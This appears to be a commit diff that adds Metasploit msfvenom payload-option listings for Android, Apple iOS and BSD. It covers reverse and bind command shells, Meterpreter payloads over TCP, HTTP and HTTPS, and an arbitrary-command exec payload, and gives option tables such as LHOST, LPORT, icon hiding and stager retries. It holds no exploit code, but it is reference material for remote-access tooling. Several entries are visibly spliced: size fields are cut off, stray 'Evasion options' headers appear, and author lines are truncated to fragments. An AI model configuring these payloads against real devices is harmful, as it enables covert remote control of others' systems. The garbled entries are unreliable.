IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/android-shell-reverse_tcp.txt
+54
View File
@@ -0,0 +1,54 @@
Name: Command Shell, Android Reverse TCP Stager
Module: payload/android/shell/reverse_tcp
Platform: Android
Arch: dalvik
Needs Admin: No
Total size: 10209
Rank: Normal
Provided by:
mihi
egypt <egypt@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Spawn a piped command shell (sh).
Connect back stager
Name Current Setting Required Description
---- --------------- -------- -----------
AndroidHideAppIcon false no Hide the application icon automatically after launch
AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled
AndroidWakelock true no Acquire a wakelock before starting the payload
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EnableStageEncoding false no Encode the second stage payload
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/apple_ios-aarch64-meterpreter_reverse_http.txt
+64
View File
@@ -0,0 +1,64 @@
Name: Apple_iOS Meterpreter, Reverse HTTP Inline
Module: payload/apple_ios/aarch64/meterpreter_reverse_http
Platform: Apple_iOS
Arch: aarch64
Needs Admin: No
Total size: 796904
Rank: Normal
Provided by:
Adam Cammack <adam_cammack@rapid7.com>
Brent Cook <brent_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
Description:
Run the Meterpreter / Mettle server payload (stageless)
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/apple_ios-aarch64-meterpreter_reverse_https.txt
+65
View File
@@ -0,0 +1,65 @@
Name: Apple_iOS Meterpreter, Reverse HTTPS Inline
Module: payload/apple_ios/aarch64/meterpreter_reverse_https
Platform: Apple_iOS
Arch: aarch64
Needs Admin: No
Total size
Evasion options for payload/apple_ios/aarch64/meterpreter_reverse_https:
=========================
<brent_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
Description:
Run the Meterpreter / Mettle server payload (stageless)
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/apple_ios-aarch64-meterpreter_reverse_tcp.txt
+58
View File
@@ -0,0 +1,58 @@
Name: Apple_iOS Meterpreter, Reverse TCP Inline
Module: payload/apple_ios/aarch64/meterpreter_reverse_tcp
Platform: Apple_iOS
Arch: aarch64
Needs Admin: No
Total size: 796904
Rank: Normal
Provided by:
Adam Cammack <adam_cammack@rapid7.com>
Brent Cook <brent_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Run the Meterpreter / Mettle server payload (stageless)
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/apple_ios-aarch64-shell_reverse_tcp.txt
+38
View File
@@ -0,0 +1,38 @@
Name: Apple iOS aarch64 Command Shell, Reverse TCP Inline
Module: payload/apple_ios/aarch64/shell_reverse_tcp
Platform: Apple_iOS
Arch: aarch64
Needs Admin: No
Total size: 152
Rank: Normal
Provided by:
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SHELL /bin/sh yes The shell to execute.
Description:
Connect back to attacker and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/apple_ios-armle-meterpreter_reverse_http.txt
+63
View File
@@ -0,0 +1,63 @@
Name: Apple_iOS Meterpreter, Reverse HTTP Inline
Module: payload/apple_ios/armle/meterpreter_reverse_http
Platform: Apple_iOS
Arch: armle
Needs Admin: No
Total size
Evasion options for payload/apple_ios/armle/meterpreter_reverse_http:
=========================
ok <brent_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
Description:
Run the Meterpreter / Mettle server payload (stageless)
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/apple_ios-armle-meterpreter_reverse_https.txt
+65
View File
@@ -0,0 +1,65 @@
Name: Apple_iOS Meterpreter, Reverse HTTPS Inline
Module: payload/apple_ios/armle/meterpreter_reverse_https
Platform: Apple_iOS
Arch: armle
Needs Admin: No
Total size
Evasion options for payload/apple_ios/armle/meterpreter_reverse_https:
=========================
k <brent_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
Description:
Run the Meterpreter / Mettle server payload (stageless)
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/apple_ios-armle-meterpreter_reverse_tcp.txt
+58
View File
@@ -0,0 +1,58 @@
Name: Apple_iOS Meterpreter, Reverse TCP Inline
Module: payload/apple_ios/armle/meterpreter_reverse_tcp
Platform: Apple_iOS
Arch: armle
Needs Admin: No
Total size: 643824
Rank: Normal
Provided by:
Adam Cammack <adam_cammack@rapid7.com>
Brent Cook <brent_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Run the Meterpreter / Mettle server payload (stageless)
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsd-sparc-shell_bind_tcp.txt
+38
View File
@@ -0,0 +1,38 @@
Name: BSD Command Shell, Bind TCP Inline
Module: payload/bsd/sparc/shell_bind_tcp
Platform: BSD
Arch: sparc
Needs Admin: No
Total size: 164
Rank: Normal
Provided by:
vlad902 <vlad902@gmail.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Listen for a connection and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsd-sparc-shell_reverse_tcp.txt
+45
View File
@@ -0,0 +1,45 @@
Name: BSD Command Shell, Reverse TCP Inline
Module: payload/bsd/sparc/shell_reverse_tcp
Platform: BSD
Arch: sparc
Needs Admin: No
Total size: 128
Rank: Normal
Provided by:
vlad902 <vlad902@gmail.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Connect back to attacker and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsd-vax-shell_reverse_tcp.txt
+38
View File
@@ -0,0 +1,38 @@
Name: BSD Command Shell, Reverse TCP Inline
Module: payload/bsd/vax/shell_reverse_tcp
Platform: BSD
Arch: vax
Needs Admin: No
Total size: 100
Rank: Normal
Provided by:
wvu <wvu@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Connect back to attacker and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsd-x64-exec.txt
+33
View File
@@ -0,0 +1,33 @@
Name: BSD x64 Execute Command
Module: payload/bsd/x64/exec
Platform: BSD
Arch: x64
Needs Admin: No
Total size: 23
Rank: Normal
Provided by:
joev <joev@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CMD yes The command string to execute
Description:
Execute an arbitrary command
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsd-x64-shell_bind_ipv6_tcp.txt
+38
View File
@@ -0,0 +1,38 @@
Name: BSD x64 Command Shell, Bind TCP Inline (IPv6)
Module: payload/bsd/x64/shell_bind_ipv6_tcp
Platform: BSD
Arch: x64
Needs Admin: No
Total size: 90
Rank: Normal
Provided by:
Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Listen for a connection and spawn a command shell over IPv6
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
